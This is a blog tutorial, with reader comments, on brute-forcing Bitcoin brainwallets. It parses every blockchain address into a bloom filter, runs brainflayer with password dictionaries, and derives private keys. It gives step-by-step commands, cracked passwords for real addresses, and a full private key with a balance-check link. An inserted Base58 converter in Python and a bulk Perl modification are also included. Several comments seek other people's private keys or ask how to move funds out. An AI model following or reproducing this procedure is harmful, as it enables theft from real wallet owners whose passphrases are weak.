Bitcoin Brainwallet Cracking Tools

Introduction:
New Cracking Tool Exposes Major Flaw in Bitcoin Brainwallets
http://www.coindesk.com/new-cracking-tool-exposes-major-flaw-in-bitcoin-brainwallets/

Download brainflayer: https://github.com/ryancdotorg/brainflayer

1. Password dictionary
Download CrackStation dictionary: https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm

2. Install Bitcoin Daemon: https://github.com/bitcoin/bitcoin

3. Open source blockchain tool Blockparser
Blockparser download: https://github.com/znort987/blockparser
Retrieve all Bitcoin addresses using Blockparser

./parser allBalances > allBalances.txt

awk '{ print $2 }' allBalances.txt > btcaddress.hex

4. Convert Bitcoin address to Hash160 address
Tool written in Perl: http://lenschulwitz.com/base58
A slight change is needed to make it convert a text file.

5. Convert the Hash160 addresses to a bloom filter file using hex2blf

hex2blf btcaddress.hex btcaddress.blf

6. Run brainflayer

brainflayer -b btcaddress.blf -i password.txt

7. Sample output: (first column is Bitcoin Hash160 address, the last column is the password)

6e24b1342852a8e4af3c63206f8b2266ba887ef6:u:str:1234
ec42ad7fd54f931274b83f6137379206e458b106:u:str:1satoshi

long numeric passwords:

09b508bae503da42f05575891866d0072bcf65f6:u:str:011235813213455
32f6ace81715e0872e6db7ff4a280185205620a3:u:str:12345678901234567890
afe66e0314eb15a5cd01d95b94166ce995c3347d:u:str:000000000000000000000000000000

long alphabet passwords:

482bc0946efa74a5a3d005e693b2774e1aeb7dad:u:str:qwertyuiopasdfghjklzxcvbnm
4b1b231e9caa7f95d51ed7c99df68a5add5a1714:u:str:doandroidsdreamofelectricsheep
bf1f119153f6ecedb259f0043f9fbbc88687b22e:u:str:thepastisagrotesqueanimal

passwords made of sentences:

ac8dc3fcfa4e9e91dddfc0c3fe6d7e0021292036:u:str:may the force be with you
8b0a993126c3bf8f4b28c8264b553d6aa39f2956:u:str:Money is the root of all evil.
1622dc9d9e5423d7b84122f9ef7edfa1981d9960:u:str:nothing ventured nothing gained
0c7cdc2d447af8d422dd2b54cab2f274ca88131d:u:str:No one can make you feel inferior without your consent.
8ee2d47121c480c37f9dd0a88bddf2dc21b284da:u:str:The quick brown fox jumped over the lazy dog.
2029758fa9d81f9c36f4be2ab8696ad10fc602f8:u:str:The quick brown fox jumps over the lazy dog
838edc90c250d298fc115bf028164f105e228fb9:u:str:these aren't the droids you're looking for
8c4cfbd55dd01f6c221372eba1e57c7496d7239f:u:str:This is the way the world ends.
31ae15fc484cf5fd34ecd49e1afb51e3f2174a93:u:str:tomb-of-the-unknown-soldier-identification-badge

passwords in Chinese characters:

7afa3b687e58d3f16feccb8244b90a87a535b85c:u:str:试试看
73b1bebd338fc051dba7282d4f99846fac01df23:u:str:中国上海

8. Convert Hash160 address back to Bitcoin address
ec42ad7fd54f931274b83f6137379206e458b106:u:str:1satoshi
Converted to a Bitcoin address: 1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49
The brainwallet password is 1satoshi
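
Steps 4 and 8 are the two directions of Base58Check coding. The Python sketch below is an added example, not code from the original post or from the linked Perl tool: it decodes a legacy address into its version byte and Hash160, verifies the 4-byte checksum, and encodes a Hash160 back into an address. The function names are illustrative, and the sample address is the Bitcoin wiki test vector.

```python
import hashlib

B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

def _checksum(payload: bytes) -> bytes:
    # Base58Check checksum: first 4 bytes of SHA256(SHA256(payload))
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]

def address_to_hash160(address: str):
    """Step 4: decode a legacy address into (version byte, Hash160 hex)."""
    address = address.strip()
    num = 0
    for ch in address:
        idx = B58.find(ch)
        if idx < 0:
            raise ValueError(f"invalid Base58 character {ch!r}")
        num = num * 58 + idx
    # Each leading '1' stands for one leading zero byte.
    pad = len(address) - len(address.lstrip("1"))
    raw = b"\x00" * pad + num.to_bytes((num.bit_length() + 7) // 8, "big")
    # Raw layout: 1 version byte + 20-byte Hash160 + 4 checksum bytes,
    # so a plain Base58 decode is 50 hex characters, the Hash160 only 40.
    if len(raw) != 25:
        raise ValueError(f"decoded to {len(raw)} bytes, expected 25")
    payload, check = raw[:21], raw[21:]
    if _checksum(payload) != check:
        raise ValueError("checksum mismatch (mistyped or corrupted address)")
    return payload[0], payload[1:].hex()

def hash160_to_address(hash160_hex: str, version: int = 0) -> str:
    """Step 8: encode a 20-byte Hash160 as a Base58Check address."""
    h160 = bytes.fromhex(hash160_hex)
    if len(h160) != 20:
        raise ValueError("Hash160 must be 20 bytes (40 hex characters)")
    payload = bytes([version]) + h160
    raw = payload + _checksum(payload)
    num, out = int.from_bytes(raw, "big"), ""
    while num:
        num, rem = divmod(num, 58)
        out = B58[rem] + out
    pad = len(raw) - len(raw.lstrip(b"\x00"))
    return "1" * pad + out

if __name__ == "__main__":
    # Bitcoin wiki test vector, used here as a sample value
    version, h160 = address_to_hash160("16UwLL9Risc3QfPqBUvKofHmBQ7wMtjvM")
    print(version, h160)
    print(hash160_to_address(h160, version))
```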

9. Bitcoin wallet balance
Check the Bitcoin balance on Blockchain.info:

https://blockchain.info/q/addressbalance/1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49

10. Private key for the Bitcoin address
Download open source tool Addressgen: https://github.com/sarchar/addressgen

Example: ec42ad7fd54f931274b83f6137379206e458b106:u:str:1satoshi
Bitcoin address: 1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49

Run

./genaddress.py -p 1satoshi

Output:

ECDSA private key (random number / secret exponent)
51b2156ca4b9d96c9e77938b1197b806a4a2822060da15d79f2f6f8f75655644
Bitcoin private key (Base58Check, uncompressed)
5JSGPQ2Jw1P5cVi2L8LeuWnMF5H8rLGrPPgVM2XE1cahG1BQDzY
Bitcoin extended private key (Base58Check)
xprv9s21ZrQH143K3TEjPXq1CkrNDMfYWYwVNKVWqSPeEthWqd4uJKWSRnM2GX2BYktMDQrGxa2FZrpDdt5Q1qeLk4T46974eh9Eo7iHCfGcY37
(embedded private key) -> L43jHnozmKE5TYNqMwsPgXNcTfRT7TNhzDkTgaKAgYcx99Qm5LhB
------
ECDSA public key (uncompressed)
04a3599acf74fc7b781207860e8753f182fc4b8c5febe6c5f2e09381893abb4e0b290a172aa6a7ba13c5a32de6d10a024d95cf786d72e650889a4a22f29a3b84df
Bitcoin Address (uncompressed, length=34):
1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49
Bitcoin extended public key
xpub661MyMwAqRbcFwKCVZN1Zto6mPW2v1fLjYR7dpoFoEEViRQ3qrpgyafW7nhb8fPtRaX2TJbCXQAfgAhMYGJ9DJeF1UVAMYu3Ucd3BqaeU9R
(embedded public key) -> 032131be64ba3f27e757c2f0f310038a8dfb768ff922448aff2841fa7954472880
(bitcoin address) -> 1Kvdg9jcdcdWGBb77Rovd8jkHjPd4eKB6t

As you can see above, the bitcoin address is 1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49
and the private key is 5JSGPQ2Jw1P5cVi2L8LeuWnMF5H8rLGrPPgVM2XE1cahG1BQDzY

39 thoughts on “Bitcoin Brainwallet Cracking Tools”

  • Monday July 25th, 2016 at 09:54

    I need a more in-depth tutorial on how to do this step by step properly. Thanks if you can send me one by email, please.

  • Saturday July 30th, 2016 at 16:43

    Hi pal, great tut. Does this still work? Would love to give it a shot.

  • Thursday September 22nd, 2016 at 03:24

    Hi,

    Great article!

    I have one problem though, at step 4, since I am not a developer, I am having a hard time figuring out what change to do to make it process a whole file. I am using a csv file which was generated by another blockparser (not znort’s) and it only outputs addresses in Base58.

    How could I convert them all in one go to hex format?

    Thanks in advance!

    • Thursday September 22nd, 2016 at 15:46

      Download the Perl script from: http://lenschulwitz.com/b58/base58perl.txt
      rename it to base58perl.pl

      replace the last part of the script from:

      #Sample test taken from https://en.bitcoin.it/wiki/Technical_background_of_version_1_Bitcoin_addresses.
      my $base58_encoded_address = "16UwLL9Risc3QfPqBUvKofHmBQ7wMtjvM";
      print "\nRunning tests for bitcoin address $base58_encoded_address\n";
      print "Bitcoin address is valid.  Address type: '", check_bitcoin_address($base58_encoded_address), "'.\n";
      my $binary_address = decodebase58tohex($base58_encoded_address);
      print "Binary hexadecimal representation is: $binary_address\n";
      my $reencoded_base58 = encodebase58fromhex($binary_address);
      print "Re-encoded back to Base58 is: $reencoded_base58\n\n";

      to:

      use feature 'say';

      my $fileSrc = 'base58.txt';
      open(my $fhSrc, '<', $fileSrc) or die "Could not open $fileSrc: $!";

      my $fileDest = 'hex.txt';
      open(my $fhDest, '>>', $fileDest) or die "Could not open file $fileDest: $!";

      # Convert one Base58 address per line; strip the newline before decoding.
      while (my $base58_encoded_address = <$fhSrc>) {
        chomp $base58_encoded_address;
        next unless length $base58_encoded_address;
        my $binary_address = decodebase58tohex($base58_encoded_address);
        say $fhDest $binary_address;
      }

      close $fhSrc;
      close $fhDest;

      This should read Base58 addresses from base58.txt and save the hex-format addresses to hex.txt.

      • Thursday September 22nd, 2016 at 15:54

        Awesome, it worked!

        Thank you!

  • Sunday September 25th, 2016 at 17:18

    Hopefully someone can make a full detail on how to make this work in Linux.

    • Sunday September 25th, 2016 at 17:19

      A tutorial, I mean 🙂

  • Wednesday November 9th, 2016 at 16:25

    How long does it take for you to get output from brainflayer? I have completed up to step #7 but now it appears brainflayer is either working in the background or doing nothing???

    I can make video tut if Jack doesn’t mind. I can’t explain much of background processes as I usually compile and pack all data tightly and quickly to script it.

    • Sunday November 13th, 2016 at 21:58

      Use a known password for testing and you should see the output in one second.

      A video tutorial would be great. You can post the link here.

    • Saturday January 21st, 2017 at 06:40

      Do you have a video tutorial? It would be great 😀

  • Wednesday December 28th, 2016 at 01:05

    Does it still work?

  • Friday January 20th, 2017 at 04:09

    Good day and keep up the good work. Please, I omitted steps 1 – 3 because I am trying to use my wallet ID to check how secured my wallet is, but got stuck on steps 4 to 5.
    Need clarification on the following as a newbie to programming:

    1. Do I need to follow the procedure you suggested on “Download the Perl script from: http://lenschulwitz.com/b58/base58perl.txt
    rename it to base58perl.pl”?
    2. If I am to do the same after the modification, where do I upload the update?

    3. After the aforementioned steps, in what environment in github (is it “bitcoin command prompt” or “brainflayer command prompt”) do I input the command “hex2blf btcaddress.hex btcaddress.blf”?

    4. Also, will I replace btcaddress.hex with the hex value of my public key generated via http://lenschulwitz.com/base58

    Thank you as I await your esteemed clarification

    • Tuesday January 24th, 2017 at 16:50

      1. Yes
      2. You upload the file to where the btcaddress.hex file is. Then run the Perl script to convert addresses in btcaddress.hex to Hash160 format
      3. Run the command “hex2blf” in a Linux environment
      4. Yes, btcaddress.hex will be updated to Hash160 format

  • Thursday January 26th, 2017 at 04:38

    Thanks so much for your valued feedback.
    Pls help clarify as I am new to programming and my background is Windows.
    1. Would all the downloads from step 1 to step 7 be mounted on Linux OS like Ubuntu, KDE etc or on github?
    2. Pls. under which tool will I locate btcaddress.hex?
    Apologies to bore you as I await your feedback.

    • Tuesday February 7th, 2017 at 11:25

      1. All tools run on Linux OS
      2. You create the file btcaddress.hex at step 3

  • Wednesday March 8th, 2017 at 16:52

    Upon make request for brainflayer I receive this error:

    gcc -O3 -flto -funsigned-char -falign-functions=16 -falign-loops=16 -falign-jumps=16 -Wall -Wextra -Wno-pointer-sign -Wno-sign-compare -pedantic -std=gnu99 -static brainflayer.o hex.o bloom.o mmapf.o hsearchf.o ec_pubkey_fast.o ripemd160_256.o dldummy.o algo/brainwalletio.o algo/warpwallet.o algo/keccak.o algo/sha3.o algo/brainv2.o secp256k1/.libs/libsecp256k1.a scrypt-jane/scrypt-jane.o -lssl -lrt -lcrypto -lz -lgmp -o brainflayer
    /usr/bin/ld: cannot find -lgmp
    collect2: error: ld returned 1 exit status
    Makefile:68: recipe for target ‘brainflayer’ failed
    make: *** [brainflayer] Error 1

    help please

  • Saturday March 11th, 2017 at 18:19

    Please, which app did you use to run the program?

  • Thursday April 27th, 2017 at 07:08

    Hello, pls, I need a private key of someone. How can I get that? All the apps that I downloaded did not work. Pls help me out
    13Ugd1nDEgr9WPTZQVoxu4saqvwetkz7B4

    1J7R8Q2N22Skg9QPAEhW8wBR1jEA4bJPo8

    1H1jr23Vvc9iM575p8QqqM7RWjcaJRHZ6a
    thanks

    • Friday May 5th, 2017 at 12:22

      This tool is not for the purpose of recovering the private key for a given bitcoin address.

  • Wednesday May 3rd, 2017 at 03:16

    Hi Jack,

    I have tried every step in this tutorial (I stripped the 0 balance hashes out), but no luck so far.
    Could you provide a hash that I can put in my list that will definitely result in a match? My brainflayer has been running for quite some time, and there are 0 hits.

  • Monday May 22nd, 2017 at 13:15

    How do I run any of these files on windows?
    To me these are just folders with random files I have no idea what to do with..
    Just a little help on that would be greatly appreciated!

    Thank You.

    • Thursday June 22nd, 2017 at 22:29

      These tools run on Linux. I don’t have the Windows version.

  • Tuesday May 23rd, 2017 at 02:44

    Hi Jack,
    I have a question: when I run the last program you gave us I get this error,
    File “D:\George\Crack\GeorgeS\addressgen-master\genaddress.py”, line 456, in
    main()
    File “D:\George\Crack\GeorgeS\addressgen-master\genaddress.py”, line 411, in main
    public_key, private_key = gen_key_pair()
    File “D:\George\Crack\GeorgeS\addressgen-master\genaddress.py”, line 94, in gen_key_pair
    if ssl_library.EC_KEY_generate_key(k) != 1:
    OSError: exception: access violation reading 0xFFFFFFFFD96E1A98
    I import the libeay32.dll both also for win64 also for win 32.
    How can I use this tool?

  • Friday May 26th, 2017 at 20:54

    If you could make an offline step-by-step video, we would all be very appreciative, sir. Thanks for sharing your knowledge with us.

  • Thursday June 1st, 2017 at 00:01

    Hello.
    I have encrypted DOGE wallet.
    I convert encrypted address HERE : http://lenschulwitz.com/base58
    After make this command
    1):-Name:~/brainflayer$ ./hex2blf btcaddress.hex btcaddress.blf
    [*] Initializing bloom filter…
    [*] Loading hash160s from ‘btcaddress.hex’ 100.0%
    [*] Loaded 1 hashes, false positive rate: ~2.298e-167 (1 in ~4.351e+166)
    [*] Writing bloom filter to ‘btcaddress.blf’…
    [+] Success!
    r@r-System-Product-Name:~/brainflayer$

    and create password.txt.

    2)Then use –
    :Name:~/brainflayer$ ./brainflayer -b btcaddress.blf -i password.txt
    r@r-System-Product-Name:~/brainflayer$

    But it outputs nothing.
    What’s wrong? Should I install doge daemon and parse doge blockchain??
    I very much need help!

  • Thursday June 1st, 2017 at 00:31

    Seems it works, but no password found

    Name:~/brainflayer$ ./brainflayer -b btcaddress.blf -i password.txt -v -o r.txt
    rate: 382.29 p/s found: 0/7 elapsed: 0.018 s

    1E6B167A33CC29B7A3284499E5093E1F1DEDA7AE8C59C661A2 -hash
    password is 34os48trs
    passwordlist^
    4t4t4tr5
    45454545
    454545rt
    4r4r4r5t
    34os48trs
    34os48Trs
    349848trs

    What is wrong???

  • Thursday June 1st, 2017 at 13:01

    Hello.
    I am now trying to find my doge wallet password. Ubuntu 17.04
    But I have not installed a DOGE wallet like .dogecoin
    I just used the doge wallet address on the site http://lenschulwitz.com/base58 , got the hash from it and made btcaddress.blf.

    Seems it works, but no password found
    Name:~/brainflayer$ ./brainflayer -b btcaddress.blf -i password.txt -v -o r.txt
    rate: 382.29 p/s found: 0/7 elapsed: 0.018 s
    1E6B167A33CC29B7A3284499E5093E1F1DEDA7AE8C59C661A2 -hash
    password is 34os48trs
    passwordlist^
    4t4t4tr5
    45454545
    454545rt
    4r4r4r5t
    34os48trs
    34os48Trs
    349848trs
    What is wrong???
    If you cannot help me or won’t do it, let me know by email. Thanks

  • Thursday June 8th, 2017 at 03:08

    Can we use this on an address that has balance already, when we just want to find the private key as well as password? I assume it can be done by pasting the address in the txt file, and then carrying on the procedure?

    • Thursday June 22nd, 2017 at 22:18

      No, this is not a tool to crack or generate private key for a given bitcoin address.

  • Monday June 26th, 2017 at 13:00

    good day dear Jack
    great tool …
    so with this tool one could find brainpasswords and would be able to transfer out the funds?
    doesn’t it make it too easy for the evil-doers?
    thank you …

  • Monday June 26th, 2017 at 18:36

    With this tool it’s possible to crack a brainwallet private key if you’re lucky. It’s a brute-force password cracking tool.

    This is why brainwallet.org permanently closed.
